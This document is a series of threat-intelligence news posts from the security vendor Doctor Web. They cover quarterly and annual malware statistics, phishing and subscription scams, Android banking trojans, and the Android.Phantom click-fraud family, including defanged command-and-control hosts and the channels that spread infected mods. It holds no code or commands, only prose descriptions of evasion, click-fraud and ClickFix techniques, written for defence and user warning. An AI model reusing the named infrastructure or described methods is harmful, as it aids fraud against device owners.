All the news

Doctor Web’s Q1 2026 virus activity review

Wed, 01 Apr 2026 00:00:00 GMT

April 1, 2026

According to statistics collected by the Dr.Web anti-virus, the total number of threats detected in the first quarter (Q1) of 2026 decreased by 6.77%, compared to the fourth quarter of last year. The number of unique threats decreased by 11.98%. Adware programs and ad-displaying trojans, malicious downloader apps, and backdoors were most commonly detected on protected devices.

Most widely encountered in email traffic were malicious scripts, backdoors, and various trojans. Threat actors also used emails to distribute phishing documents and exploits.

Users whose files were affected by encoder trojans had primarily encountered Trojan.Encoder.35534, Trojan.Encoder.29750 and Trojan.Encoder.41868.

In Q1 2026, Doctor Web’s Internet analysts detected new phishing websites, including fake online resources of credit organizations and marketplaces as well as a number of other unwanted sites.

The mobile device segment saw increased activity on the part of banking trojans. At the same time, our malware analysts noted the growing popularity of a method used to prevent malicious programs from being detected by anti-viruses. This method involves adding junk code to the apps.

In January, Doctor Web’s experts informed users about the Android.Phantom trojan clickers, which use machine learning and video broadcasting to boost clicks on websites. In addition, over the past three months, we detected the emergence of yet more malware on Google Play, including trojans that subscribe users to paid services.

Principal trends in Q1 2026

The number of threats detected on protected devices decreased
Fewer unique files exist among the threats that were detected
Compared to the previous observation period, fewer users requested help to decrypt files affected by encoder trojans
Banking trojans for Android devices continued to increase their activity
Users were at risk of encountering Android.Phantom clicker trojans, which use machine learning, among other techniques, to boost clicks on websites
More malicious apps were discovered on Google Play

According to Doctor Web’s statistics service

The most common threats in Q1 2026

Trojan.Siggen31.34463: A trojan written in the Go programming language and designed to download various miner trojans and adware into infected systems. This malware is a DLL file located at %appdata%\utorrent\lib.dll. To launch, it exploits a DLL Search Order Hijacking vulnerability in the uTorrent torrent client.
Adware.Downware.20655
Adware.Downware.20766: Adware that often serves as an intermediary installer of pirated software.
Trojan.BPlug.4268: The detection name for a malicious component of the WinSafe browser extension. This component is a JavaScript file that displays intrusive ads in browsers.
Adware.Siggen.33379: A fake Adblock Plus browser ad blocker that is installed on the system by other malware to display advertisements.

Statistics for malware discovered in email traffic

The most common threats in email traffic in Q1 2026

JS.DownLoader.1225: Heuristic detection for ZIP archives containing JavaScripts with suspicious names.
W97M.DownLoader.2938: A family of downloader trojans that exploit vulnerabilities in Microsoft Office documents. They can also download other malicious programs to a compromised computer.
Exploit.CVE-2017-11882.123
Exploit.CVE-2018-0798.4: Exploits designed to take advantage of Microsoft Office software vulnerabilities that allow an attacker to run arbitrary code.
JS.Redirector.514: A malicious script that redirects users to a web page controlled by fraudsters.

Encryption ransomware

In Q1 2026, the number of requests made to decrypt files affected by encoder trojans decreased by 31.51%, compared to Q4 2025. The decline occurred against the backdrop of the New Year holidays and the associated long weekend, during which a number of cybercriminals may have suspended their activity and gone on vacation. At the same time, users who nonetheless suffered from encoder trojan attacks during this period may not have immediately responded to incidents that had occurred.

The dynamics of the decryption requests received by Doctor Web’s Technical Support Service:

The most common encoders of Q1 2026

Trojan.Encoder.35534 — 15.59% of user requests
Trojan.Encoder.29750 — 3.23% of user requests
Trojan.Encoder.41868 — 3.23% of user requests
Trojan.Encoder.26996 — 1.62% of user requests
Trojan.Encoder.44383 — 1.61% of user requests

Network fraud

Over the past three months, Doctor Web’s Internet analysts discovered a number of new fake marketplace websites on which fraudsters offer the chance to join in a “clearance sale” of supposedly unredeemed orders. The fraudulent scheme works like this: the “unclaimed” goods from the orders are divided into different categories (electronics, clothes, footwear, cosmetics, etc.) and are allegedly packed into the corresponding surprise boxes. Their content is unknown and is claimed to possibly include expensive items. At the same time, potential victims are offered a chance to buy these boxes at a relatively low price, which is the main lure of this scam.

A fake marketplace site promises a “sale of unclaimed orders” that are supposedly overflowing warehouses

When a user selects one of the boxes, they are asked to place an order and provide personal information that may include their first and last names, mobile phone number, and email address. Next, the user is redirected to the payment page to pay via the Faster Payments System (“Система быстрых платежей”, “СБП”, or “SBP”). As a result, the victim loses their money and provides confidential data to the fraudsters.

After placing an “order”, the victim is asked to pay for it via the Faster Payments System

Our experts also identified many websites for services offering various financial products, such as the ability to swiftly obtain a microloan, a regular loan, or go through bankruptcy proceedings. Such services do not provide these products themselves, as users expect, and are only intermediaries between clients and financial institutions. They provide paid access to a selection of potentially suitable options, while the aggregation of such financial offers is available from free sources. Moreover, these services do not guarantee a successful result when an application is submitted. At the same time, access is granted not after a one-time payment, but after a paid subscription involving periodic debits is taken out.

One of the websites requiring users to pay in order to access a service for selecting financial offers. Users believe they are making a one-time payment for access, but unbeknownst to them, they are signing up for a subscription

In some cases, such resources can mislead users by offering them one type of service, like job placements, but actually provide subscription access to the aforementioned financial offers for loans, microloans, etc.

A website promises to help visitors find a job, but once payment is made to access the service, financial proposals (loans, microloans, etc.) from the website’s partners may be offered instead

Among the phishing sites identified in Q1 2026 were fake web resources for the Green Marathon (“Зеленый Марафон”) charity race. They offer visitors the opportunity to register for the marathon, but these sites are not affiliated with the event and are designed to collect users’ confidential data.

One of the fake sites for the Green Marathon charity race

Doctor Web’s Internet analysts also discovered more fake investment service websites that were supposedly affiliated with various credit organizations. Among them were sites targeting audiences from Russia, Kazakhstan, and other countries. Scammers promise potential victims high profits and, in order to “access” pseudo-investment platforms, they are asked to take a short survey and register an account by providing personal information.

An example of a phishing website that malicious actors pass off as an official resource for an investment service of one Russian bank

An example of a phishing site that cybercriminals present as an official online resource for an investment service of one Kazakhstani credit institution

Find out more about Dr.Web non-recommended sites

Malicious and unwanted programs for mobile devices

According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q1 2026, the growth in activity observed in Q4 last year with regards to Android.Banker banking trojans continued to trend upward. The most widespread among them were members of the Android.Banker.Mamont subfamily. At the same time, the number of detections of the ad-displaying trojans Android.MobiDash and Android.HiddenAds decreased yet again.

Topping the list of the most commonly detected potentially dangerous software were apps to which junk code has been added with the help of Android program modification tools (such apps containing junk code are detected as Tool.Obfuscator.TrashCode). Currently, this technique is actively being used to protect banking trojans from anti-virus detection. In addition, programs modified using the NP Manager tool remained prevalent (these are detected as Tool.NPMod).

The most widely detected unwanted software programs were Program.FakeAntiVirus fake anti-viruses, which demand that users purchase the full version of the software to “cure” threats that had supposedly been found. The most active ad-displaying software programs in Q1 were Adware.Bastion.1.origin and Adware.Opensite.15. The former are optimization apps that create notifications containing informational messages about supposed low memory and system errors in order to display ads during “optimization”. The latter are fake cheat software for obtaining in-game resources, but, in reality, they load websites containing ads.

In January 2026, our anti-virus laboratory informed users about the Android.Phantom trojan clickers. These malicious programs use machine learning and video broadcasts to boost clicks on websites. Cybercriminals distributed them in several ways: via the GetApps app catalog for Xiaomi devices, Telegram channels, Discord servers, third-party software collections, and malicious sites.

Over the past three months, Doctor Web’s virus analysts discovered new threats on Google Play. Among them were Android.Joker and Android.Subscription trojans, which subscribe users to paid services.

The following Q1 2026 events involving mobile malware are the most noteworthy

Android.Banker banking trojans became the most widespread threats for Android devices.
Cybercriminals increasingly used Android app modding tools to protect banking trojans from anti-virus detection.
The trend of decreasing activity on the part of Android.MobiDash and Android.HiddenAds adware trojans continued.
Users were at risk of encountering Android.Phantom trojans, which use machine learning and video broadcasts to artificially boost clicks on websites.
Malicious apps were again distributed via Google Play.

To find out more about the security-threat landscape for mobile devices in Q1 2026, read our special overview.

Doctor Web’s Q1 2026 review of virus activity on mobile devices

Wed, 01 Apr 2026 00:00:00 GMT

April 1, 2026

According to detection statistics collected by Dr.Web Security Space for mobile devices, the trojans Android.MobiDash and Android.HiddenAds, which display intrusive ads, continued to decline in activity in the first quarter (Q1) of 2026. Compared to the fourth quarter of last year, they were detected on protected devices 32.70% and 7.09% less often, respectively. They lost their lead to Android.Banker banking trojans, whose activity increased by more than 2.5 times over the course of the last three months. As a result, they have become the most widespread Android threats. Such malicious apps intercept SMS containing transaction confirmation codes coming from banks, display phishing windows, and can also imitate the appearance of real banking software to steal confidential data. Users were most likely to encounter trojans from the Android.Banker.Mamont subfamily, which includes a variety of malicious programs.

In Q1, widely common were apps to which junk code had been added to obfuscate their logic (these accounted for 15.35% of all detections registered). This modification is performed using NP Manager hacker tools for modding Android software. Since last fall, these tools are actively being used in the Android.Banker.Mamont trojan family to evade anti-virus detection. That is why we warn users when a particular app has been altered in such a way. Dr.Web Anti-virus products detect such apps as Tool.Obfuscator.TrashCode.

Other widespread potentially dangerous software, despite a 31.65% decrease in the number of detections, was again software modified with the help of the NP Manager tool. (Dr.Web detects them as Tool.NPMod). This tool contains various modules for protecting and obfuscating the apps’ code as well as for bypassing digital signature verification once apps are modified. Cybercriminals use it to protect malware so that anti-viruses have a harder time detecting it.

The most prevalent unwanted software was Program.FakeAntiVirus—fake anti-viruses that allegedly detect threats and demand that users purchase the full version to “cure” the infection. Moreover, users again encountered apps from the Program.FakeMoney and Program.CloudInject families. The former supposedly allow users to earn money by completing various tasks. The latter are apps modified using the CloudInject cloud service. Via this service, the programs are given dangerous system permissions as well as an obfuscated code whose functionality cannot be controlled.

The most frequently detected adware programs were Adware.Bastion.1.origin optimization apps. These periodically create notifications containing misleading messages that inform users about alleged low memory and system errors. Their goal is to display ads during “optimization”. Another popular adware was Adware.Opensite.15—programs which cybercriminals pass off as cheat tools for obtaining resources in games. In reality, such apps load various ad-filled websites. Adware.AdPush—programs with built-in ad-displaying modules—were also widespread once again.

In January, Doctor Web informed users about a new family of trojan clickers, dubbed Android.Phantom. Our virus analysts identified several distribution sources for these malicious apps. One was the official app catalog for Xiaomi devices—GetApps, where the trojans were found to be embedded in several games. Moreover, threat actors distributed the clickers within the mods of popular software via various Telegram channels, Discord servers, online software collections, and malicious websites.

Using Android.Phantom trojans, cybercriminals manipulate ad clicks on websites with the help of both machine-learning technologies and WebRTC, a technology for transmitting streaming data (including video) through a browser. The trojans load target websites along with JavaScript code for simulating user actions in WebView. Interaction with ads occurs in one of two modes. If a device supports WebRTC, Android.Phantom clickers broadcast a virtual screen with the loaded website to the attackers, who then control the website manually or using an automated system.

If WebRTC is not available, automated JavaScript scripts utilizing the TensorFlowJS framework are used. The clickers download the required behavioral model from a remote server as well as JavaScript containing the framework itself and all of the functions necessary for the model to operate and interact with target sites.

Over the course of Q1, Doctor Web’s anti-virus laboratory identified new threats on Google Play. Among them were many Android.Joker trojans as well as the malicious apps Android.Subscription.23 and Android.Subscription.24. All of them are designed to subscribe users to paid services.

Principal trends of Q1 2026

Android.Banker banking trojans became the most common Android threats.
Cybercriminals have begun using Android app modding tools more often to protect banking trojans.
The ad-displaying trojans Android.MobiDash and Android.HiddenAds continued to be less active.
The spread of Android.Phantom trojan apps, which utilize machine learning and video broadcasts to boost clicks on websites, was notable.
New malware was detected on Google Play.

According to statistics collected by Dr.Web Security Space for mobile devices

Android.Banker.Mamont.80.origin: A banking trojan that intercepts SMS containing one-time codes from credit organizations, hijacks the contents of notifications, and collects other confidential information. This includes technical data about the infected device, the list of installed apps, and information about the SIM card, phone calls, and sent and received SMS.
Android.FakeApp.1600: A trojan app that loads the website hardcoded into its settings. Known modifications of this malicious program load an online casino site.
Android.HiddenAds.675.origin: A trojan app designed to display intrusive ads. Members of the Android.HiddenAds family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.
Android.Packed.57.origin: The detection name for an obfuscator used to protect apps, including malicious ones (for example, some Android.SpyMax banking trojan versions).
Android.Click.1812: The detection name for malicious WhatsApp messenger mods that can covertly load various websites in the background.

Program.FakeAntiVirus.1: The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.
Program.FakeMoney.11: The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.
Program.CloudInject.5
Program.CloudInject.1: The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as Tool.CloudInject). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, modders can remotely manage these apps—blocking them, displaying custom dialogs, tracking when other software is being installed or removed from a device, etc.
Program.SnoopPhone.1.origin: An application designed to monitor the activity of Android device owners. It allows intruders to read SMS, collect call information, track device location, and record the surroundings.

Tool.Obfuscator.TrashCode.1
Tool.Obfuscator.TrashCode.2: The detection name for Android programs to which junk code has been added, using hacker tools for modifying Android apps. Such modification is performed to scramble the apps’ logic. This technique is often found in banking trojans and pirated software.
Tool.NPMod.3
Tool.NPMod.1: The detection name for Android programs that have been modified using the NP Manager utility. This tool contains modules for obfuscating and protecting the apps’ code as well as for bypassing their digital signature verification after they have been modified. The obfuscation it adds is often used to make the malware more difficult to detect and analyze.
Tool.LuckyPatcher.2.origin: A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change the logic of their work or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads from the Internet specially prepared scripts, which can be crafted and added to a common database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.

Adware.Bastion.1.origin: The detection name for optimization programs that periodically create notifications containing misleading messages. They inform users about alleged low memory and system errors in order to display ads during “optimization”.
Adware.AdPush.3.origin: An adware module that can be built into Android apps. It displays notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, this module collects a variety of confidential data and is able to download other apps and initiate their installation.
Adware.Opensite.15: Apps passed off as cheat tools for obtaining resources in games. In fact, they are created to display ads. These programs receive a configuration from a remote server and use it to open a target website containing ads like banners, pop-up windows, video clips, etc.
Adware.Fictus.1.origin: An adware module that malicious actors embed into cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.
Adware.Airpush.7.origin: Adware modules that can be built into Android apps and display various ads. Depending on the modules’ version and modification, these can be notifications containing ads, pop-up windows or banners. Malicious actors often use these modules to distribute malware by offering their potential victims diverse software for installation. Moreover, such modules collect personal information and send it to a remote server.

Threats on Google Play

In Q1 2026, Doctor Web’s anti-virus laboratory experts discovered more Android.Joker malicious programs, which subscribe victims to paid services. The trojans were concealed in a number of tools for optimizing the operation of Android devices, and were distributed under the guise of messengers, multimedia, and other software. In total, they have been installed at least 370,000 times.

Examples of Android.Joker malware detected on Google Play in Q1 2026. Android.Joker.2511 was built into the messenger Private Chat Message, and Android.Joker.2524—into the camera app Magic Camera

Moreover, our malware analysts discovered the malicious programs, Android.Subscription.23 and Android.Subscription.24, which are also designed to subscribe users to paid services. These trojans load websites, where a paid mobile subscription is activated with the help of Wap Click technology. On these sites, users are asked to provide their mobile phone number, after which an attempt is made to automatically activate a subscription. Both trojans were downloaded from Google Play over 1.5 million times in total.

The Android.Subscription.23 and Android.Subscription.24 malicious programs were distributed as Stream Hive and Prime Link, apps for managing personal finances, but their only functionality was loading websites to subscribe Android device owners to paid mobile services

To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.

Indicators of compromise

Dr.Web for personal computers receives SKD AWARDS product excellence distinction

Tue, 24 Mar 2026 16:18:54 GMT

The comprehensive antivirus solution Dr.Web Security Space was once again given an SKD AWARDS industry honour. The antivirus was recognised as best product in the “Personal Computer Security” category.

Doctor Web has managed to win this award three years in a row. Back in 2023, Dr.Web Security Space 12.0 for Windows prevailed in the Personal Computer Security category; in 2024, the antivirus solution for desktops and laptops was once again recognised as best product, whilst Dr.Web Mobile Engine SDK came out on top in the Antivirus Engines category.

SKD AWARDS is hosted annually by SKD Labs, an internationally recognised independent information security testing and certification laboratory. Unofficially, this award is often referred to as the “Oscar for Cybersecurity products”. It is regarded as one of the key credibility markers that indicate superior quality.

Participating products undergo a series of tests that evaluate their features, performance, technical innovation, behaviour in real-life scenarios, and ability to detect and eliminate threats.

Android.Phantom trojans are bundled with modded games and popular apps to infiltrate smartphones. They use machine learning and video broadcasts to engage in click fraud

Wed, 21 Jan 2026 05:00:00 GMT

January 21, 2025

Experts at the Doctor Web antivirus laboratory have discovered and investigated a new trojan clicker malware family. All of these trojans either are administered via the hxxps[:]//dllpgd[.]click server or get downloaded and launched after the corresponding instruction is received from the remote host. Malware belonging to this family infects Android smartphones.

Xiaomi’s GetApps software catalogue is one of its principal distribution channels.

We have been able to identify multiple games that contain the trojans. They include: Creation Magic World (over 32k downloads), Cute Pet House (over 34k downloads), Amazing Unicorn Party (over 13k downloads), Sakura Dream Academy (over 4k downloads), Theft Auto Mafia (more than 61k downloads), and Open World Gangsters (over 11k downloads). All of the compromised games appear to have been uploaded by a single developer—SHENZHEN RUIREN NETWORK CO., LTD. The trojans are bundled with the apps and start alongside them.

It is also worth mentioning that the original versions of the above-listed titles contained no malicious code. On September 28-29, the developer rolled out game updates that contained the Android.Phantom.2.origin trojan. This malicious program can operate in two modes that are designated in its code as the signalling and phantom modes.

In phantom mode, the malware uses its hidden WebView widget to load web content. Upon receiving a corresponding command from the server hxxps[:]//playstations[.]click, it loads a click fraud target site and downloads a JavaScript file named “phantom”. The file incorporates an automation script for interacting with ads on the site as well as the TensorFlowJS machine learning framework. The framework model is downloaded to the app’s directory from the server hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com. To work with certain types of ads, Android.Phantom.2.origin outputs the content to a virtual screen and takes screenshots. The trojan will then use TensorFlowJS routines to analyse them and tap on the identified relevant elements.

In signalling mode, the trojan employs WebRTC to connect to a third-party server. This technology enables browsers and other apps to establish peer-to-peer connections and exchange data, audio, and video in real time with no additional software needing to be installed. When the signalling mode is enabled, the previously mentioned server hxxps[:]//dllpgd[.]click acts as a central server to help the WebRTC nodes find each other. This server also determines whether the trojan should run in phantom or signalling mode. Tasks related to targeted sites are provided by hxxps[:]//playstations[.]click. Then Android.Phantom.2.origin covertly transmits to the perpetrators a video showing a loaded website on a virtual screen. The trojan allows the connected WebRTC peer to remotely control the browser on the virtual screen: tap, scroll, and enter or paste text into the input form.

On October 15-16, yet another update was released for the above-mentioned games. In addition to Android.Phantom.2.origin, they delivered the Android.Phantom.5 module. It is a dropper that retrieves Android.Phantom.4.origin from other remote hosts. This malicious program downloads several other click-fraud trojans to operate on various sites. These modules feature a simpler design compared to Android.Phantom.2.origin—they're not enhanced with machine learning and streaming features but rely on pre-defined click-fraud routines in JavaScript.

To use WebRTC, the trojan requires the Java API, which is not shipped with Android by default and normally doesn't get downloaded with apps. That’s why at first, the trojan mostly ran in phantom mode. However, once Android.Phantom.5 had been introduced into the apps, Android.Phantom.2.origin was further enhanced with the Android.Phantom.4.origin dropper that delivered the API library it required.

Attackers also use other distribution channels to spread Android.Phantom.2.origin and Android.Phantom.5. For example, Spotify app mods with premium features unlocked are made available on various sites and in Telegram channels, including:

Spotify Plus

Spotify Pro

Telegram channels:

Spotify Pro
(54,400 subscribers)

Spotify Plus – Official
(15,057 subscribers)

The altered Spotify app that perpetrators offer on the websites and in the Telegram channels is bundled with Android.Phantom.2.origin and the WebRTC library.

In addition to the Spotify app mods, attackers also incorporate trojans into modified apps for other popular streaming services, including YouTube, Deezer, Netflix and more. These are usually available on portals offering modded APK files:

Apkmody

Moddroid

The Moddroid portal features the “Editor's Choice” section. Only 4 of the editor’s 20 picks proved to be malware-free. The remaining 16 contained Android.Phantom trojans. The apps found on these two sites are loaded from the same CDN server at hxxps[:]//cdn[.]topmongo[.]com. These catalogues are also available as Telegram channels where users download modified APK files containing trojans:

Moddroid.com
(87,653 subscribers)

Apkmody Chat
(6,297 subscribers)

Criminals also use Discord servers to promote and spread the infected apps. Spotify X is the most popular one. It has about 24,000 subscribers.

Its administrators don't shy away from offering compromised APK files to users in a more direct fashion. For example, the screenshot above shows how an administrator is offering visitors a Deezer music streaming app for download instead of a Spotify application, since the latter has stopped working.

The download link will provide the user with a program that actually works. Its code is protected with a proprietary packer concealing Android.Phantom.1.origin. Upon receiving an instruction from hxxps[:]//dllpgd[.]click will download the now well familiar Android.Phantom.2.origin, Android.Phantom.5, and the spyware trojan Android.Phantom.5.origin. The latter relays to the attackers information about the device—including the phone number, location, and a list of the installed apps.

This screenshot of the server shows what languages the impacted users speak. To access chat rooms in languages other than English, they have to react to the appropriate flag. Users who spoke Spanish, French, German, Polish and Italian appeared to be in the majority (English, which appears to be the server’s default language, is not factored in). Furthermore, the server administrators didn’t set up chat rooms for many Asian countries.

These trojans can inflict severe damage to the owners of infected devices. Here are just a few of the possible adverse consequences:

An unsuspecting accomplice. A user's smartphone can be commandeered to partake in a DDoS attack and, by doing so, get its owner unwittingly involved in a cybercrime.
Illegal activity. Attackers can use a compromised device to conduct illegal activities: run online fraud schemes or send spam messages.
Increased battery use and traffic. Covert activities drain the battery and increase mobile data usage.
Personal data leaks. Android.Phantom.5.origin is spyware that will transmit information about the device and its owner to a third party.

Trojans of this strain pose a threat to Android device owners who don't use up-to-date antivirus software. Sometimes users experience availability issues involving foreign online services, which forces them to seek out and use alternative and often shady methods to circumvent restrictions. This situation plays into the hands of virus makers as users are more likely to take chances and put their faith in dubious techniques. Children are particularly vulnerable. In their drive to play videogames, listen to music or watch videos, they tend to completely disregard information security basics.

We strongly advise you against downloading modified APK files from dubious sites and Telegram channels. As a rule, verifying the sources of such mods or apps takes time and requires some experience. That’s why using Dr.Web Security Space is probably the best way to ensure that you and your loved ones enjoy a worry-free experience with your mobile devices. Dr.Web protects not only smartphones but also game consoles, tablets and smart TVs.

Indicators of compromise
More about Android.Phantom.1.origin
More about Android.Phantom.2.origin
More about Android.Phantom.3
More about Android.Phantom.4.origin
More about Android.Phantom.5
More about Android.Phantom.5.origin

Doctor Web’s virus activity review for 2025

Thu, 15 Jan 2026 00:00:00 GMT

January 15, 2026

In 2025, trojans designed to display ads were one of the most active threats. Users also encountered various malicious scripts and trojan programs that launch other malware in infected systems. In email traffic, trojan downloaders, backdoors, exploits, malicious scripts, and phishing documents were most commonly detected.

Among mobile threats, the most widespread were ad-displaying trojans and fake apps used in a variety of fraudulent schemes. An increase in banking trojan activity was also observed. At the same time, Doctor Web’s virus analysts discovered dozens of new malicious, unwanted, and adware programs on Google Play.

Compared to 2024, Doctor Web received fewer user requests to decrypt files affected by encoder trojans. Meanwhile, over the last year, our Internet analysts detected more fraudulent websites created to steal Telegram accounts. Moreover, unwanted financial websites were popular once again.

In 2025, Doctor Web’s anti-virus laboratory investigated several targeted attacks, one of which was carried out on a Russian engineering company. During the attack, threat actors used a number of malicious apps in an attempt to obtain confidential data from infected computers. Our experts ascertained that the Scaly Wolf hacker group was involved in the attack. Another incident occurred when a Russian government organization was attacked by the Cavalry Werewolf hacker group. Doctor Web’s virus analysts discovered many of the malicious tools used by these threat actors and also studied the features of the group and the actions it typically performs in compromised networks.

Throughout last year, Doctor Web also reported on other information security incidents. In January, our anti-virus laboratory discovered an active campaign that was being orchestrated by cybercriminals who were using a variety of different malware programs to mine Monero cryptocurrency. In April, we informed users about a trojan that cybercriminals had imbedded in the firmware of several budget Android smartphone models in order to use it to steal cryptocurrency. Also in April, our experts identified an Android trojan that malicious actors had embedded into a version of a popular mapping software program and were using to spy on Russian military personnel.

In July, Doctor Web informed users about a new family of trojans designed to steal cryptocurrency and passwords. Malicious actors distributed them under the guise of game mods, patches, and cheats. In August, our virus analysts warned about the distribution of a multi-functional backdoor for mobile devices that was targeting employees of Russian businesses. Cybercriminals remotely controlled this malware and used it to steal confidential data and spy on victims.

In October, we published information about a backdoor for Android devices that cybercriminals were distributing as part of modified versions of the Telegram X messenger. This malicious program steals logins and passwords for Telegram accounts and other sensitive data. With its help, the attackers can control the victims’ hacked accounts and gain full control over the messenger itself, performing various actions on behalf of account owners.

In December, we released an article about a trojan that artificially increases the popularity of websites by pretending to be a real human so that its actions are not blocked by the anti-bot protection on the sites. This malware independently seeks out target websites in search engines, opens them, and performs clicks on the opened web pages, based on the parameters it receives from the threat actors.

The year 2025 also saw a rise in the popularity of ClickFix attacks, in which malicious actors use social engineering to trick users into running malicious code on their devices.

Principal trends of the year

Trojans designed to display ads were highly active
New targeted attacks occurred
Attacks using the ClickFix method became more popular
The number of incidents involving encoder trojans decreased
The number of Android banking trojan detections increased
New cases of Android device firmware infections were identified
Various malicious and unwanted programs were again distributed via Google Play

The most notable events of 2025

In January 2025, Doctor Web’s specialists uncovered a campaign to mine Monero cryptocurrency using the malicious miner SilentCryptoMiner. Its files were disguised as various software, like programs for making video calls. When infecting computers, they removed other miners that might have been previously installed in the system. As part of this campaign, the attackers used steganography, a technique that allows certain data to be hidden among other data (for example, in images), to distribute some of the malicious components. After the specially crafted images were downloaded, the corresponding SilentCryptoMiner components were extracted from them and launched.

In April, our virus analysts informed users about the Android.Clipper.31 trojan found in the firmware of a number of budget Android smartphone models. Threat actors built this trojan into a modified version of WhatsApp messenger, which they then preinstalled on devices after compromising the supply chain of some manufacturers. Android.Clipper.31 intercepts messages sent in the trojanized messenger, searches for the Tron and Ethereum crypto wallet addresses in them, and replaces the addresses with those that belong to the attackers. At the same time, the malware conceals this substitution, and victims see the correct crypto wallet addresses in such messages.

Later in April, Doctor Web’s experts discovered the Android.Spy.1292.origin trojan, which cybercriminals embedded into a version of Alpine Quest mapping software and used it to spy on Russian military personnel. The malware collected confidential information and allowed the attackers to steal files from the infected devices.

In July, Doctor Web released news material on its website covering Trojan.Scavenger malicious programs, which are designed to steal cryptocurrency and passwords. The attackers distributed these under the guise of game mods, cheats, patches, etc. The trojans were launched using legitimate software, including via the exploitation of DLL Search Order Hijacking class vulnerabilities.

In August, our specialists notified users about the spread of the multi-functional backdoor Android.Backdoor.916.origin, which was targeting representatives of Russian companies. The malware, disguised as anti-viruses, was distributed via direct messages in messengers. Once the target devices were infected, Android.Backdoor.916.origin collected confidential data and allowed the attackers to spy on victims.

Also in August, Doctor Web’s anti-virus laboratory released a study on a targeted attack that was perpetrated by the Scaly Wolf group against a Russian engineering company. Cybercriminals deployed a number of malicious tools, one of the main ones being the modular backdoor Updatar. It allowed the attackers to collect confidential data from the infected computers.

In October, Doctor Web’s experts warned about the Android.Backdoor.Baohuo.1.origin backdoor built into maliciously modified versions of the Telegram X messenger. Android.Backdoor.Baohuo.1.origin steals logins and passwords for Telegram accounts along with some other confidential data. The malware allows threat actors to gain full control over a user’s account and to control the messenger, performing actions in it on behalf of the victim. For example, the attackers can covertly join and leave Telegram channels and also conceal newly authorized devices in the interface of the trojanized Telegram X.

In November, we published a study on a targeted attack that the Cavalry Werewolf hacker group had carried out against a Russian government organization. During their investigation of the incident, Doctor Web’s experts discovered many of the attackers’ malicious tools, including open-source instruments. Our virus analysts studied the group’s features and found that the threat actors prefer to use reverse shell backdoors and often use the Telegram API to control infected computers. Moreover, they begin their attacks by sending phishing emails purporting to come from government agencies and attach malware disguised as various official documents to these messages.

In December, Doctor Web published its analysis of the Trojan.ChimeraWire malware, which artificially increases the popularity of websites, while pretending to be human. This trojan searches target sites via the Google and Bing search engines, opens the sites it has found, and performs clicks on their web pages in accordance with tasks received from the malicious actors. Trojan.ChimeraWire is installed on computers by a number of malicious programs that exploit DLL Search Order Hijacking class vulnerabilities.

During 2025, attacks using the ClickFix method became more popular. This method is based on social engineering, when cybercriminals trick potential victims into running malicious code themselves. When users visit a malicious or compromised website, it informs them of a supposed error or the need to update their browser and offers to “fix” the problem. Depending on the attack variant involved, users are either asked to copy the strings provided on the web page or to just click the corresponding button (for example, “Update” or “Fix”). In the latter case, the contents that the attackers need will be automatically copied into the clipboard. Next, users are encouraged to run a command line or a PowerShell terminal, paste the clipboard contents in there, and press the “Enter” button on their keyboard. As a result, victims will execute malicious code themselves, which will initiate an infection chain. More information about ClickFix attacks can be found in the corresponding article on our website.

The malware landscape

According to statistics collected by the Dr.Web anti-virus, the total number of threats detected in 2025 increased by 5.45%, compared to 2024. The number of unique threats decreased by 15.89%. Users most often encountered various malicious scripts and adware trojans. In addition, trojans that launch other malicious apps were commonly detected. Users were also targeted by trojans created in the AutoIt scripting language and distributed as part of other malware to make the latter more difficult to detect.

VBS.KeySender.6
VBS.KeySender.7: A malicious script that, in an infinite loop, searches for windows containing the text mode extensions, разработчика, and розробника and sends them an Escape key press event, forcibly closing them.
Trojan.BPlug.4242: The detection name for a malicious component of the WinSafe browser extension. This component is a JavaScript file that displays intrusive ads in browsers.
Trojan.Starter.8319
Trojan.Starter.8326
Trojan.Starter.8332: The detection name for malicious XML scripts that launch Trojan.AutoIt.289 malware and its components.
JS.Siggen5.44590: Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.
Trojan.Siggen30.53926: The detection name of an Electron framework host process modified by threat actors. It mimics a Steam application component (Steam Client WebHelper) and loads a JavaScript backdoor.
JS.MalVpn.1: A malicious script that various malicious programs use to connect to C2 servers.
Trojan.Siggen31.34463: A trojan written in the Go programming language and designed to download various miner trojans and adware into infected systems. This malware is a DLL file located at %appdata%\utorrent\lib.dll. To launch, it exploits a DLL Search Order Hijacking vulnerability in the uTorrent torrent client.

In email traffic, trojans that download and install other malware were most commonly detected in 2025. Threat actors also distributed various backdoors, exploits, phishing documents, and malicious scripts via email messages.

W97M.DownLoader.2938: A family of downloader trojans that exploit vulnerabilities in Microsoft Office documents. They can also download other malicious programs to a compromised computer.
Exploit.CVE-2017-11882.123
Exploit.CVE-2018-0798.4: Exploits designed to take advantage of Microsoft Office software vulnerabilities and allow an attacker to run arbitrary code.
JS.Phishing.684
JS.Phishing.745: A malicious JavaScript script that generates a phishing web page.
